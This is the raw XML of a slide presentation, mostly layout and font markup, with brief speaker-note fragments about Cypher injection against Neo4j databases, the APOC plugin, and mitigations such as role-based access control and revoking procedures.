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y="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Ubuntu"/>
      <p:regular r:id="rId56"/>
      <p:bold r:id="rId57"/>
      <p:italic r:id="rId58"/>
      <p:boldItalic r:id="rId59"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Staatliches"/>
      <p:regular r:id="rId60"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Black"/>
      <p:bold r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat"/>
      <p:regular r:id="rId63"/>
      <p:bold r:id="rId64"/>
      <p:italic r:id="rId65"/>
      <p:boldItalic r:id="rId66"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open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OpenSans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Black-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratBlack-bold.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-bold.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-italic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Staatliches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Open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Ubuntu-bold.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu-regular.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu-boldItalic.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu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2" name="Google Shape;31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cypher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Most ppl don’t know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Escalate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g1317ce1ab12_0_8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0" name="Google Shape;3250;g1317ce1ab12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Explain the terms after 2 slides (later)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5" name="Shape 3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" name="Google Shape;3266;g1317fc89b5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7" name="Google Shape;3267;g1317fc89b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Treedome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g1317fc89b5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4" name="Google Shape;3274;g1317fc89b5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3" name="Shape 3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4" name="Google Shape;3294;g1317fc89b5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5" name="Google Shape;3295;g1317fc89b5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3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g1317fc89b5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5" name="Google Shape;3305;g1317fc89b5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1" name="Shape 3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2" name="Google Shape;3312;g1317fc89b5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3" name="Google Shape;3313;g1317fc89b5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8" name="Shape 3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9" name="Google Shape;3319;g1317fc89b5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0" name="Google Shape;3320;g1317fc89b5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g1317fc89b5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4" name="Google Shape;3344;g1317fc89b5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g1317fc89b5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3" name="Google Shape;3353;g1317fc89b5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1317fc89b5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5" name="Google Shape;3365;g1317fc89b5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9ac7ea12a4_0_2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" name="Google Shape;3134;g9ac7ea12a4_0_2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Member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Learn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g1317fc89b5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7" name="Google Shape;3387;g1317fc89b5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0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g1317fc89b5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2" name="Google Shape;3402;g1317fc89b5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8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g1317fc89b5b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0" name="Google Shape;3410;g1317fc89b5b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8" name="Shape 3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9" name="Google Shape;3439;g1317fc89b5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0" name="Google Shape;3440;g1317fc89b5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Attacker from outside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7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g1317fc89b5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9" name="Google Shape;3449;g1317fc89b5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Leak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exploit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delete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Escalate further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Explain what is Neo4j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9e46f12aa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9" name="Google Shape;3459;g9e46f12aa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Clause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7" name="Shape 3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8" name="Google Shape;3468;g1317fc89b5b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9" name="Google Shape;3469;g1317fc89b5b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g1317fc89b5b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8" name="Google Shape;3478;g1317fc89b5b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Procedure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Clause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5" name="Shape 3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6" name="Google Shape;3486;g1317fc89b5b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7" name="Google Shape;3487;g1317fc89b5b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Apoc.text.join - list to string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4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317fc89b5b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1317fc89b5b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a43be9d971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" name="Google Shape;3144;ga43be9d971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you’re gonna get from this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4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g1317fc89b5b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6" name="Google Shape;3506;g1317fc89b5b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1" name="Shape 3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" name="Google Shape;3512;g1317fc89b5b_1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3" name="Google Shape;3513;g1317fc89b5b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0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1317fc89b5b_1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2" name="Google Shape;3532;g1317fc89b5b_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9" name="Shape 3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0" name="Google Shape;3540;g1317fc89b5b_1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1" name="Google Shape;3541;g1317fc89b5b_1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g1317fc89b5b_1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9" name="Google Shape;3549;g1317fc89b5b_1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4" name="Shape 3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5" name="Google Shape;3555;g1317fc89b5b_1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6" name="Google Shape;3556;g1317fc89b5b_1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1362a5755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1362a5755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0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g1317fc89b5b_1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2" name="Google Shape;3602;g1317fc89b5b_1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9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317fc89b5b_1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1" name="Google Shape;3641;g1317fc89b5b_1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1323ba9fb7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1" name="Google Shape;3651;g1323ba9fb7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g1317ce1ab12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7" name="Google Shape;3177;g1317ce1ab12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Forget everything you know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 caesar-cipher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 crypto cypher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g1317fc89b5b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3" name="Google Shape;3663;g1317fc89b5b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Plugin - extension to Cypher Language in Neo4J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1317fc89b5b_1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1317fc89b5b_1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g11d215760e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3" name="Google Shape;3683;g11d215760e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g1317fc89b5b_1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1" name="Google Shape;3691;g1317fc89b5b_1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Stored procedures (e.g Java)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1" name="Shape 3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2" name="Google Shape;3702;g1317fc89b5b_1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3" name="Google Shape;3703;g1317fc89b5b_1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RBAC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Role-based access control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Vendor communication - disable apoc - revoke procedure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14293f5377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4" name="Google Shape;3714;g14293f5377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RBAC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Role-based access control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Vendor communication - disable apoc - revoke procedure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g1354078970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9" name="Google Shape;3729;g1354078970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6" name="Shape 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" name="Google Shape;3737;g135407897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8" name="Google Shape;3738;g135407897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E545B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>accept an input argument and evaluates it against one or more expressions</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="4E545B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E545B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="4E545B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>divide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="4E545B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> 1 by 0</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="4E545B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8" name="Shape 3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9" name="Google Shape;3749;g1317fc89b5b_1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0" name="Google Shape;3750;g1317fc89b5b_1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0" name="Shape 3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148adb4cf8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148adb4cf8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4" name="Shape 3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g1317ce1ab12_0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6" name="Google Shape;3186;g1317ce1ab12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Say NO - caesar cipher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Used in GraphDB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Injection similar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g1317fc89b5b_1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1" name="Google Shape;3771;g1317fc89b5b_1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1317fc89b5b_1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1317fc89b5b_1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2" name="Shape 3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3" name="Google Shape;3193;g1317ce1ab12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4" name="Google Shape;3194;g1317ce1ab12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8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1317ce1ab12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1317ce1ab12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Relational, object oriented, graph DBs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GraphQL - API query language to pull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g1317ce1ab12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6" name="Google Shape;3236;g1317ce1ab12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2" name="Shape 3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3" name="Google Shape;3243;g1317ce1ab12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4" name="Google Shape;3244;g1317ce1ab12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316" y="0"/>
            <a:ext cx="9164698" cy="5208136"/>
            <a:chOff x="-13316" y="0"/>
            <a:chExt cx="9164698" cy="5208136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;11;p2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6118235" y="0"/>
              <a:ext cx="3025768" cy="2023351"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325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448062" cy="2305785"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325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905501" y="2793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545725" y="4003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524623" y="0"/>
              <a:ext cx="2619371" cy="1017382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-26" y="5"/>
              <a:ext cx="2038372" cy="1475619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>
              <a:off x="7855910" y="4"/>
              <a:ext cx="1280726" cy="3383675"/>
              <a:chOff x="9196698" y="950579"/>
              <a:chExt cx="1280726" cy="3383675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Google Shape;20;p2"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9419903" y="2786190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flipH="1" rot="10800000">
                <a:off x="9599228" y="2157664"/>
                <a:ext cx="26379" cy="26632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flipH="1" rot="10800000">
                <a:off x="9546302" y="3614502"/>
                <a:ext cx="44049" cy="47093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flipH="1" rot="10800000">
                <a:off x="9828268" y="3796617"/>
                <a:ext cx="38215" cy="35341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flipH="1" rot="10800000">
                <a:off x="10207125" y="3808369"/>
                <a:ext cx="26632" cy="26632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flipH="1" rot="10800000">
                <a:off x="9549176" y="3999362"/>
                <a:ext cx="82349" cy="79306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flipH="1" rot="10800000">
                <a:off x="9196698" y="3144502"/>
                <a:ext cx="29423" cy="29507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flipH="1" rot="10800000">
                <a:off x="9707787" y="1811104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flipH="1" rot="10800000">
                <a:off x="9613771" y="3653647"/>
                <a:ext cx="106868" cy="90212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flipH="1" rot="10800000">
                <a:off x="9387775" y="3309201"/>
                <a:ext cx="79221" cy="70597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flipH="1" rot="10800000">
                <a:off x="9540468" y="1825815"/>
                <a:ext cx="79306" cy="70851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flipH="1" rot="10800000">
                <a:off x="9725373" y="1297224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flipH="1" rot="10800000">
                <a:off x="9834186" y="950579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flipH="1" rot="10800000">
                <a:off x="9666613" y="965375"/>
                <a:ext cx="79559" cy="70597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flipH="1" rot="10800000">
                <a:off x="10177702" y="1025488"/>
                <a:ext cx="79475" cy="71612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flipH="1" rot="10800000">
                <a:off x="9490416" y="2925778"/>
                <a:ext cx="44303" cy="39737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flipH="1" rot="10800000">
                <a:off x="9352519" y="3023684"/>
                <a:ext cx="43965" cy="4109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flipH="1" rot="10800000">
                <a:off x="10177702" y="4093379"/>
                <a:ext cx="29507" cy="29423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flipH="1" rot="10800000">
                <a:off x="10421622" y="4278284"/>
                <a:ext cx="55801" cy="5597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flipH="1" rot="10800000">
                <a:off x="10177702" y="4003758"/>
                <a:ext cx="44303" cy="39822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" name="Google Shape;40;p2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="6321128" y="2391309"/>
              <a:ext cx="1715384" cy="3918269"/>
              <a:chOff x="10706378" y="539509"/>
              <a:chExt cx="1715384" cy="3918269"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Google Shape;41;p2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2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="5632457" y="-1028869"/>
              <a:ext cx="737423" cy="2819744"/>
              <a:chOff x="12445182" y="1003506"/>
              <a:chExt cx="737423" cy="2819744"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="Google Shape;59;p2"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12486357" y="2971349"/>
                <a:ext cx="35256" cy="35341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flipH="1" rot="10800000">
                <a:off x="12539199" y="3209181"/>
                <a:ext cx="61889" cy="61889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flipH="1" rot="10800000">
                <a:off x="12953481" y="2695301"/>
                <a:ext cx="47008" cy="43965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flipH="1" rot="10800000">
                <a:off x="13106174" y="2316275"/>
                <a:ext cx="20545" cy="17670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flipH="1" rot="10800000">
                <a:off x="12882969" y="2054939"/>
                <a:ext cx="26379" cy="26463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flipH="1" rot="10800000">
                <a:off x="13147264" y="194333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flipH="1" rot="10800000">
                <a:off x="13097212" y="3250271"/>
                <a:ext cx="38385" cy="35341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flipH="1" rot="10800000">
                <a:off x="12524657" y="360579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flipH="1" rot="10800000">
                <a:off x="12791742" y="358228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flipH="1" rot="10800000">
                <a:off x="13035662" y="3767194"/>
                <a:ext cx="53011" cy="5605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flipH="1" rot="10800000">
                <a:off x="12715396" y="3281215"/>
                <a:ext cx="76431" cy="71612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flipH="1" rot="10800000">
                <a:off x="12665597" y="3228373"/>
                <a:ext cx="44049" cy="39737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flipH="1" rot="10800000">
                <a:off x="12445182" y="1003506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flipH="1" rot="10800000">
                <a:off x="12518738" y="1140895"/>
                <a:ext cx="41175" cy="41259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flipH="1" rot="10800000">
                <a:off x="12788952" y="3492753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flipH="1" rot="10800000">
                <a:off x="13023910" y="2818064"/>
                <a:ext cx="44049" cy="4109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flipH="1" rot="10800000">
                <a:off x="13000405" y="2388309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2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2" y="9"/>
              <a:ext cx="3985907" cy="3918269"/>
              <a:chOff x="2524675" y="238075"/>
              <a:chExt cx="1178600" cy="1158600"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Google Shape;77;p2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" name="Google Shape;131;p2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132" name="Google Shape;132;p2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" name="Google Shape;137;p2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13729" y="0"/>
              <a:ext cx="1398984" cy="543375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" name="Google Shape;138;p2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5954700" y="0"/>
              <a:ext cx="3189300" cy="1619850"/>
              <a:chOff x="4185675" y="845125"/>
              <a:chExt cx="3189300" cy="1619850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="139" name="Google Shape;139;p2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2" name="Google Shape;142;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785300" y="1645975"/>
            <a:ext cx="5573400" cy="144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Montserrat Black"/>
              <a:buNone/>
              <a:defRPr b="0"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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905725" y="3239869"/>
            <a:ext cx="5332500" cy="2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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631850" y="2079100"/>
            <a:ext cx="58803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12" name="Google Shape;1112;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632150" y="2875056"/>
            <a:ext cx="5879700" cy="2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3" name="Google Shape;1113;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-335338" y="3242300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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6118235" y="0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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3448062" cy="2305785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1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11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="4239925"/>
            <a:ext cx="2132607" cy="903576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11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524623" y="0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11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" name="Google Shape;1121;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7855910" y="4"/>
            <a:ext cx="1280726" cy="3383675"/>
            <a:chOff x="9196698" y="950579"/>
            <a:chExt cx="1280726" cy="3383675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1122" name="Google Shape;1122;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9419903" y="2786190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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9599228" y="215766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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9546302" y="3614502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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9828268" y="3796617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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10207125" y="3808369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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9549176" y="3999362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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9196698" y="314450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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9707787" y="1811104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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9613771" y="3653647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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9387775" y="3309201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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9540468" y="1825815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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9725373" y="1297224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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9834186" y="95057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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9666613" y="965375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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="1025488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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9490416" y="2925778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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9352519" y="3023684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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="4093379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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10421622" y="4278284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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10177702" y="4003758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11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6321128" y="2391309"/>
            <a:ext cx="1715384" cy="3918269"/>
            <a:chOff x="10706378" y="539509"/>
            <a:chExt cx="1715384" cy="3918269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Google Shape;1143;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10962050" y="4005280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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12057532" y="2466178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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12242691" y="3905345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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12313119" y="3942123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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11188130" y="539509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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12028109" y="2213550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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11998771" y="104738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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10706378" y="89773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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12377798" y="1239985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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11390875" y="387017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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11928258" y="4263742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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11658045" y="384666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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11393665" y="4251990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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11655255" y="3757049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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10809357" y="4417957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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11919550" y="227535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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12004605" y="2130778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11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="5632457" y="-1028869"/>
            <a:ext cx="737423" cy="2819744"/>
            <a:chOff x="12445182" y="1003506"/>
            <a:chExt cx="737423" cy="2819744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1161" name="Google Shape;1161;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12486357" y="2971349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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12539199" y="3209181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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12953481" y="2695301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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13106174" y="2316275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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12882969" y="2054939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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13147264" y="194333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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13097212" y="3250271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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12524657" y="360579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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12791742" y="358228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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13035662" y="376719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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12715396" y="3281215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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12665597" y="3228373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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12445182" y="1003506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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12518738" y="114089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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12788952" y="3492753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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13023910" y="2818064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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="13000405" y="2388309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11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179" name="Google Shape;1179;p11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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="2590808"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1234" name="Google Shape;1234;p11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11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0" name="Google Shape;1240;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
